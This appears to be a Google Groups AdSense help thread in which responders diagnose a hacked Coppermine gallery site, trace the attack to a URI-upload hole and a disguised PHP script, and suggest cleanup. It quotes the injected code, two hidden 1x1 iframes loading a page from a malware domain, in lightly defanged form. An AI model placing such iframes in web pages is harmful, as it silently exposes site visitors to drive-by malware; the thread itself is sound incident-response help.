It is not coming from the AdSense ads, it is coming from a couple of
iFrames that have been inserted into the bottom of your page and
attempt to cause a remote action to be taken.
Here is the code that has been inserted.
<iframe
src="http://cdpuv&# 98;hfzz.com/dl/a ;dv598.php"
width=1 height=1></iframe><iframe
src="http://cdpuv&# 98;hfzz.com/dl/a ;dv598.php"
width=1 height=1></iframe>
The first iFrame src points to "http : // cdpuvbhfzz.com / dl /
adv598.php"
The second one is the same as the first.
Whether the code actually exists in the page, suggesting the page was
hacked or the server was hacked to automatically insert the code at
the end of every page can only be known by your checking your original
site files against those on the server.
In other words, either just the pages of your site has been hacked
somehow or your server itself has been gotten into.
Also, from a search engine point of view, you would be better off to
dump the search engine spam you have at the bottom of the pages of
your site.
That is a violation of Google's Webmaster Guidelines and can cause a
site to get de-indexed and it being a violation of the Webmaster
Guidelines, would in turn violate the AdSense Program Policy.
You may have gotten away with it for now but that won't last and
getting your site tanked in Google is one thing that can be repaired
but if your AdSense account is disabled, that is something that can
not be repaired.
> Also, from a search engine point of view, you would be better off to
> dump the search engine spam you have at the bottom of the pages of
> your site.
> That is a violation of Google's Webmaster Guidelines and can cause a
> site to get de-indexed and it being a violation of the Webmaster
> Guidelines, would in turn violate the AdSense Program Policy.
> You may have gotten away with it for now but that won't last and
> getting your site tanked in Google is one thing that can be repaired
> but if your AdSense account is disabled, that is something that can
> not be repaired.
Cool! If you would like help on the Google Search side of things,
there is a Google Webmaster Help Google Groups very much like this one
for Google AdSense. Check out http://groups.google.com/group/Google_Webmaster_Help when you can or if you need.
> 2. The iframe has been removed and it appears to have resolved itself
Excellent!
But, where someone got in once, someone may be able to get in again.
Making sure whatever hole was used is now plugged is the rest of what
needs to be done, if you haven't already.
Often is the case that the "hack" is executed via a script that is
coded to crawl looking for specific vulnerabilities. When it finds a
acceptable host, it "infects" it and moves on looking for other hosts
that the exploit works against.
What is especially interesting is that the iframe was inserted twice.
Whether that happened on two separate occasions or it got hit twice
the first time around is hard to tell from this vantage point but one
thing is for sure, if the hole isn't plugged, it will leak again.
Disable your URI uploads within your Group settings, coppermine has
reported this is where the hack got access to your server, also check
out your user albums on your server and within the album 10001 there
may be a zip file and image: 142739_298w3.zip this is actually a PHP
script which is changing all your folders permissions allowing them to
overwrite the coppermine script and include the i-frame.
Try and check out: http://forum.coppermine-gallery.net/index.php/topic,51671.0.html this has some good help on resolving the issues specifically with
coppermine galleries. Their is a script on page 2 that will remove the
malicious code from your site but use at your own risk. I was affected
this morning as well so now I'm upgrading to the latest coppermine
version.
> It is not coming from the AdSense ads, it is coming from a couple of
> iFrames that have been inserted into the bottom of your page and
> attempt to cause a remote action to be taken.
> Here is the code that has been inserted.
> <iframe
> src="http://cdpuv&# 98;hfzz.com/dl/a ;dv598.php"
> width=1 height=1></iframe><iframe
> src="http://cdpuv&# 98;hfzz.com/dl/a ;dv598.php"
> width=1 height=1></iframe>
> The first iFrame src points to "http : //cdpuvbhfzz.com/ dl /
> adv598.php"
> The second one is the same as the first.
> Whether the code actually exists in the page, suggesting the page was
> hacked or the server was hacked to automatically insert the code at
> the end of every page can only be known by your checking your original
> site files against those on the server.
> In other words, either just the pages of your site has been hacked
> somehow or your server itself has been gotten into.
|
